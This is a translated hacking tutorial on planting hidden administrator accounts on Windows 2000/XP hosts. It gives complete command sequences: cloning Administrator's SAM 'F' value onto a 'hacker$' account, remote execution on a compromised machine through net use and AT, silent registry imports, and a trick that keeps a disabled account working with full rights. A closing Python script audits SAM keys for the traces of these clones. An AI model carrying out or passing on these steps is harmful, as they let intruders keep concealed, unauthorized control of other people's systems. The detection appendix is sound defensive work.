A few days ago I saw an illustrated tutorial on a website about creating a hidden super user, and it gave me a lot of inspiration. The author only explained how to create one from the local graphical interface, and said that he could not do it from the command line, so I started to explore. At first I used reg.exe (version 3.0) to import the registry file, but every hidden super user I created that way was unusable. When I opened the registry to look, I found that the data type of the hidden super user's default value had not been imported. That data type is a hexadecimal number (the default value type for Administrator is 000001F4; in the example below it is 00000409) rather than a string, DWORD or binary type, so reg.exe cannot recognise it and cannot import it, while the registry editor regedit.exe imports it without trouble from the graphical interface. Then it occurred to me that regedit.exe is a dual-mode program: it runs in the Windows interface and also under DOS. Since the graphical regedit.exe can import this data type, it should be able to import it from the command line too, and my later tests confirmed this. My method of creating a hidden super user is as follows.

I. Creating a hidden super user from the graphical interface

This applies to the local machine or to a compromised host (the original calls such a machine a "broiler") reached through the 3389 terminal service. The tutorial author I mentioned above did very well, but his method is more complicated and needs PSU.exe (a program for running as the SYSTEM user), which you would have to upload to the host. With the method described here PSU.exe is not needed, because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. (In XP, regedit.exe and regedt32.exe are in fact one program, and permissions are changed through "Permissions" in the right-click menu of a key.) Everyone is familiar with regedit.exe, but it cannot set permissions on the registry; the greatest advantage of regedt32.exe is that it can. On NT/2000/XP the account information is under HKEY_LOCAL_MACHINE\SAM\SAM in the registry, but apart from the SYSTEM user no one has the right to view what is inside, so I first use regedt32.exe to give myself Full Control on the SAM key. That makes the information in the SAM key readable and writable. The specific steps are:

1. Suppose we are logged in to the host over the terminal service as the super user Administrator. First create an account, hacker$, from the command line or the Account Manager. I create it from the command line:
   net user hacker$ 1234 /add
2. Click Start → Run, enter regedt32.exe and press Enter to start regedt32.exe.
3. Select the key HKEY_LOCAL_MACHINE\SAM\SAM, open the Security menu, click "Permissions", click Add in the window that appears, and add the account you are logged in as. I am logged in as Administrator, so I add Administrator and set its permission to "Full Control". Note: it is best to add your own logged-in account or the group it belongs to; do not modify the original accounts or groups, or you will cause a series of unnecessary problems. Once the hidden super user is built, come back here and delete the account you added.
4. Click Start → Run, enter regedit.exe and press Enter to start regedit.exe. Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$.
5. Export the keys hacker$, 00000409 and 000001F4 as hacker.reg, 409.reg and 1f4.reg. Open the exported files in Notepad, copy the value of the super user's key "F" under 000001F4, overwrite the value of the key "F" under 00000409 (the key that corresponds to hacker$) with it, and then merge 409.reg into hacker.reg.
6. On the command line run: net user hacker$ /del to delete the user hacker$.
7. In the regedit.exe window press F5 to refresh, then choose File → Import Registry File and import the modified hacker.reg.
8. The hidden super user hacker$ is now built. Close regedit.exe and, in the regedt32.exe window, restore the permissions of HKEY_LOCAL_MACHINE\SAM\SAM (just remove the Administrator entry you added).
9. Note: once the hidden super user is built, you cannot see hacker$ in the Account Manager, nor with the "net user" command on the command line. But after it is built you cannot change its password: if you change the password of hacker$ with the net user command, this hidden super user becomes visible in the Account Manager and cannot be deleted.

II. Creating a hidden super user from the command line

This uses the AT command. Because a scheduled task created by AT runs as SYSTEM, there is no need for PSU.exe. To use AT, the Schedule service must be running on the host; if it is not, it can be started remotely with a tool such as netsvc.exe or sc.exe (any other way of starting the Schedule service also works). For the command-line method you can use any kind of connection, for example sqlexec against MSSQL on port 1433 or the Telnet service: as long as you can get a cmdshell you can run the AT command.

1. First find a host; how to find one is not what I am describing here. Here the host has the super user administrator with password 12345678. Now we start to create the hidden super user remotely from the command line. (The host in the example is a machine on my LAN; I changed its IP address to 13.50.97.238 so as not to point at a real address on the Internet.)
2. First establish a connection with the host:
   net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"
3. Create a user on the host with the AT command (if the Schedule service is not started, start it remotely with netsvc.exe or sc.exe):
   at 13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add
   Because the user is added this way, the net user command on the command line does not display it, but you can see it in the Account Manager.
4. Likewise export the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users with the AT command:
   at 13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
   /e is the regedit.exe export switch, and the key path must end with ...\Users. If necessary, enclose the command in quotation marks: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users".
5. Download hacker.reg from the host to this machine and edit it with Notepad:
   copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg
   The way to edit it is the same as in the graphical method, so it is not repeated here.
6. Copy the edited hacker.reg back to the host:
   copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
7. Check the host's time with net time \\13.50.97.238, then delete the user hacker$ with the AT command:
   at 13.50.97.238 13:40 net user hacker$ /del
8. Verify that hacker$ is deleted: disconnect from the host with net use \\13.50.97.238 /del, then try to connect with that account:
   net use \\13.50.97.238\ipc$ "1234" /user:"hacker$"
   If the connection fails, the account has been deleted.
9. Reconnect to the host with net use \\13.50.97.238\ipc$ "12345678" /user:"administrator", get the host's time, and use AT to import the hacker1.reg copied to the host into its registry:
   at 13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
   The regedit.exe parameter /s means silent mode.
10. Verify that hacker$ has been created, in the same way as checking that it was deleted above.
11. Then verify that the user hacker$ has read, write and delete permissions; if you are still not reassured, you can also check that it can create other accounts.
12. Step 11 shows that the user hacker$ has super user privilege: the account I originally created with AT was an ordinary user, but now it has remote read, write and delete permissions.

III. If the host does not have the 3389 terminal service and I don't want to use the command line, what then?

In that case you can still use the graphical interface to create a hidden super user on the host. regedit.exe and regedt32.exe can both connect to a network registry, so you can use regedt32.exe to set permissions on the remote host's registry key and regedit.exe to edit the remote registry. The Account Manager can also manage another computer, so you can use it to create and delete accounts on the remote host. The specific steps are much the same as above, so I won't say more; the only drawback is that the speed is unbearable. There are two prerequisites:
1. First establish a connection to the remote host with net use \\<host ip>\ipc$ "password" /user:"super user name", so that regedit.exe, regedt32.exe and the Account Manager can connect to it.
2. The remote host must have the Remote Registry service running (if it is not, you can start it remotely too, since you have the super user's password).

IV. Creating a hidden super user from a disabled account

We can use a disabled user on the host to create a hidden super user. The method is:
1. First see which users are disabled. In general some administrators disable Guest for security, and of course other accounts may be disabled as well. In the graphical interface this is easy: a disabled account shows a red cross. On the command line I have not thought of a good way; I can only run "net user <user name>" for each user, one by one, to see whether it is disabled.
2. Here we assume the user hacker has been disabled by the administrator. First I use the clone program ca.exe to clone hacker into a super user (after cloning, the user hacker is automatically activated):
   ca.exe <host ip> administrator <super user password> hacker <hacker password>
3. If you now have a cmdshell, whether through the Telnet service or by connecting to MSSQL's default port 1433 with sqlexec, just enter the command: net user hacker /active:no, and the user hacker is disabled (at least on the surface). Of course you can substitute another disabled user for hacker.
4. If you now look at the users in the Account Manager in the graphical interface, you will find that the user hacker is disabled. But is it really? Connect to the host with this disabled user and see whether it can connect: net use \\<host ip>\ipc$ "hacker password" /user:"hacker". I can tell you that after many tests it succeeds, and it is a super user.
5. What if there is no cmdshell? You can disable the user hacker with AT instead: at <host ip> <time> net user hacker /active:no
6. Principle: I can't explain the specific, deep principle; I can only put it in the simplest terms. If you first disable the super user Administrator in the Account Manager in the graphical interface, a dialog pops up and refuses to let you continue disabling the super user Administrator. During cloning, the "F" key of hacker in the registry is replaced by the "F" key of the super user Administrator, so hacker has the super user's permissions; but because the "C" key of hacker in the registry is still the original "C" key, hacker is still disabled, while its super user permissions are not disabled. That is why a disabled user can still connect to the host and still has super user permissions. I'm not sure I understand it myself; everyone can judge for themselves.

V. Notes
1. After the hidden super user is created, you cannot see this user in the Account Manager or on the command line, but the user exists.
2. After the hidden super user is created, its password cannot be changed again, because once the password is changed the hidden super user is exposed in the Account Manager and cannot be deleted.
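To make the principle above concrete from the defender's side, here is an added example (not code from the original article) that audits parsed SAM user keys for the traces this technique leaves: a Users subkey whose "F" block carries another account's RID (the F swap), a Users subkey with no Names entry, and the disabled-but-cloned variant of section IV. The F-block offsets are taken from public SAM parsers rather than from the article, and the sample keys are constructed.

```python
import struct
# F-value field offsets as documented by public SAM parsers (assumption: not
# from the original article). ACB bit 0 is the "account disabled" flag.
F_RID_OFFSET = 0x30      # u32: the RID the F block was written for
F_ACB_OFFSET = 0x38      # u16: account-control bits
ACB_DISABLED = 0x0001
ADMIN_RID = 0x1F4        # 500, the built-in Administrator key 000001F4

def make_f(rid, acb):
    """Constructed 0x50-byte F blob with only the two audited fields set."""
    buf = bytearray(0x50)
    struct.pack_into("<I", buf, F_RID_OFFSET, rid)
    struct.pack_into("<H", buf, F_ACB_OFFSET, acb)
    return bytes(buf)

def audit_sam_users(users, names):
    """users: {'000001F4': F-bytes} mirroring the ...\\Users subkeys; names:
    {'Administrator': 0x1F4} mirroring each ...\\Users\\Names entry's default
    value type. Returns {key: [finding, ...]} for cloned or hidden keys."""
    findings = {}
    known_rids = set(names.values())
    for key, f in users.items():
        key_rid = int(key, 16)
        f_rid = struct.unpack_from("<I", f, F_RID_OFFSET)[0]
        acb = struct.unpack_from("<H", f, F_ACB_OFFSET)[0]
        notes = []
        if f_rid != key_rid:
            # The F block belongs to another account: the hallmark of a clone.
            notes.append(f"F block RID {f_rid} != key RID {key_rid}")
            if f_rid == ADMIN_RID:
                notes.append("F copied from Administrator")
        if key_rid not in known_rids:
            # A Users subkey with no Names entry cannot be enumerated by name.
            notes.append("no Names entry for this RID")
        if notes and acb & ACB_DISABLED:
            # Foreign F plus the disabled bit: the section IV variant.
            notes.append("account is flagged disabled")
        if notes:
            findings[key] = notes
    return findings

# Constructed sample mirroring the article: Administrator, hacker$ under
# 00000409 with F copied from 000001F4, a disabled clone, a normal user.
SAMPLE_USERS = {
    "000001F4": make_f(ADMIN_RID, 0x0210),
    "00000409": make_f(ADMIN_RID, 0x0210),      # hacker$ after the F swap
    "000003EA": make_f(ADMIN_RID, 0x0211),      # hacker: cloned, then /active:no
    "000003E9": make_f(0x3E9, 0x0210),          # consistent ordinary account
}
SAMPLE_NAMES = {"Administrator": 0x1F4, "hacker$": 0x409,
                "hacker": 0x3EA, "alice": 0x3E9}
```

On a live system the same check applies to the Users subkeys and Names value types read from an offline SAM hive; a mismatch between the RID inside "F" and the key name is what a password change later exposes in the Account Manager.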